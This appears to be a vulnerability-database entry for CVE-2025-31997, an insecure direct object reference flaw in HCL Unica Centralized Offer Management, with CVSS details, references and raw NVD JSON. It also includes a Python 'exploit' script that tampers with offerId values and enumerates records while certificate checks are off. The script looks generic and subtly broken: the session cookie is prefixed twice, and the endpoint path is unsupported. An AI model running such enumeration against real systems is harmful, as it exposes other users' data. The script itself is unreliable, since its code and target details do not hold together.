CVE-2025-31997

Description

HCL Unica Centralized Offer Management is vulnerable to Insecure Direct Object References (IDOR). An attacker can bypass authorization and access resources in the system directly, for example database records or files.

CVSS Details

CVSS Score

4.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:unica_centralized_offer_management:*:*:*:*:*:*:*:* - VULNERABLE

HCL Unica Centralized Offer Management（具体受影响版本需参考HCL官方安全公告KB0124422）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-31997 - HCL Unica Centralized Offer Management IDOR PoC
# This PoC demonstrates the Insecure Direct Object References vulnerability
# that allows bypassing authorization to access restricted resources.

import requests

# Target configuration
TARGET_URL = "https://target-hcl-unica.example.com"
SESSION_COOKIE = "JSESSIONID=authenticated_session_cookie"  # Valid session with high-privilege account

# Step 1: Normal request to access a legitimate resource
def normal_request(resource_id):
    """Send a normal authenticated request to view a resource"""
    url = f"{TARGET_URL}/unica/offer/centralized/viewOffer"
    params = {"offerId": resource_id}
    cookies = {"JSESSIONID": SESSION_COOKIE}
    response = requests.get(url, params=params, cookies=cookies, verify=False)
    return response

# Step 2: IDOR exploitation - modify the resource ID to access unauthorized resources
def exploit_idor(target_resource_id):
    """
    Exploit IDOR by changing the offerId parameter to access resources
    belonging to other users without proper authorization checks.
    """
    print(f"[*] Attempting to access resource ID: {target_resource_id}")
    response = normal_request(target_resource_id)
    
    if response.status_code == 200:
        print(f"[+] SUCCESS: Unauthorized access to resource {target_resource_id}")
        print(f"[+] Response data: {response.text[:500]}")
        # Extract sensitive data from the response
        if "offerName" in response.text or "customerData" in response.text:
            print(f"[!] Sensitive data exposed in resource {target_resource_id}")
        return response.text
    else:
        print(f"[-] Failed with status code: {response.status_code}")
        return None

# Step 3: Enumerate accessible resources by iterating through IDs
def enumerate_resources(start_id=1, end_id=100):
    """Enumerate all accessible resources via IDOR"""
    exposed_data = []
    for resource_id in range(start_id, end_id + 1):
        data = exploit_idor(resource_id)
        if data:
            exposed_data.append({"id": resource_id, "data": data})
    return exposed_data

# Main execution
if __name__ == "__main__":
    # Example: Access a resource that the current user should not have permission to view
    print("=== CVE-2025-31997 IDOR Exploitation PoC ===")
    # Attempt to access resource ID 9999 (likely belonging to another user)
    exploit_idor(9999)
    # Uncomment below to perform mass enumeration
    # enumerate_resources(1, 1000)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-31997
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-31997
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-31997/
[4] VulDB https://vuldb.com/cve/CVE-2025-31997
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124422

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-31997", "sourceIdentifier": "[email protected]", "published": "2025-10-12T03:15:34.393", "lastModified": "2025-10-29T17:27:23.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Unica Centralized Offer Management is vulnerable to Insecure Direct Object References (IDOR). An attacker can bypass authorization and access resources in the system directly, for example database records or files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:unica_centralized_offer_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.1.0.1", "matchCriteriaId": "5542E4D6-1B72-44F5-8CFF-D31D47444299"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124422", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}